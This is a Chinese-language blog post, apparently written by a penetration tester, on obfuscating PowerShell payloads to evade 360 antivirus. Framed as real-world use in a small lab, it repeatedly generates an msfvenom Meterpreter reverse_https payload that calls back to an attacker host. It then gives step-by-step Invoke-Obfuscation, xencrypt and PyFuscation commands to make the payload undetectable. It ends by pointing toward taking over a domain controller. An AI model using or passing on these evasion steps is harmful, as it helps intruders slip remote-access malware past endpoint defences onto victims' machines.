Powershell 混淆/免殺
作者 : Noth
前言 :
筆者在實戰中常常會遇到一些防毒軟體,360 安全衛士或其他,當遇到真的有點頭疼,執行一些 Powershell 腳本時往往會被防毒偵測到,這樣就有點苦逼了,於是筆者想說從自己最常遇到大陸的 360 防毒開始學習繞過。
內文 :
說到 Powershell 腳本混淆,最著名的應該是 Invoke-Obfuscation,它是一個非常強大的混淆工具 xD ,直接實戰繞過 360 就知道了 !
1. Invoke-Obfuscation
實作環境 :
攻擊者 : 192.168.78.128 , kali
受害者 : 192.168.78.133 , windows 2016 (安裝360安全衛士)
msf 產出 meterpreter ps1 腳本 :
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.78.128 LPORT=4443 -f psh-reflection > msf-crow.ps1
管理員權限開啟 powershell , 進入到 Invoke-Obfuscation 目錄
導入模塊 :
Import-Module C:\Users\zxc7528064\Desktop\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1
Invoke-Obfuscation
設置混淆腳本 :
show options
set ScriptPath C:\Users\zxc7528064\Desktop\msf-crow.ps1
ENCODING
1
out shell.ps1
執行 shell.ps1 腳本 :
成功 meterpreter :
2. xencrypt
實作環境 :
攻擊者 : 192.168.78.128 , kali
受害者 : 192.168.78.133 , windows 2016 (安裝360安全衛士)
msf 產出 meterpreter ps1 腳本 :
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.78.128 LPORT=4443 -f psh-reflection > msf-crow.ps1
將生成的 1.ps1 放入到 xencrypt 資料夾中 :
管理員權限開啟 powershell , 進入到 xencrypt-master 目錄 :
匯入模塊,並進行 xor 混淆生成新的 2.ps1 (不會被查殺) :
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile C:\Users\zxc7528064\Desktop\xencrypt-master\1.ps1 -OutFile C:\Users\zxc7528064\Desktop\xencrypt-master\2.ps1
msf 開始監聽 :
3. PyFuscation
實作環境 :
攻擊者 : 192.168.78.128 , kali
受害者 : 192.168.78.133 , windows 2016 (安裝360安全衛士)
msf 產出 meterpreter ps1 腳本 :
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.78.128 LPORT=4443 -f psh-reflection > msf-crow.ps1
進入到 PyFuscation 執行 PyFuscation.py
python3 PyFuscation.py -fvp --ps /home/kali/Desktop/msf-crow.ps1
不會被 360 查殺 :
執行 01112022_06_10_16.ps1 腳本 :
以上是筆者找到還不錯用的混淆工具,方便直接繞過 360 防毒 xD 像類似的免殺還有 exe . cobaltsrtike 等,進內網後我們要搜尋的目標就是 Domain Controller(DC),以及拿下 DC 之後我們要做的事情,千里之行,始於足下,希望筆者懂得知識量越來越多。
留言
張貼留言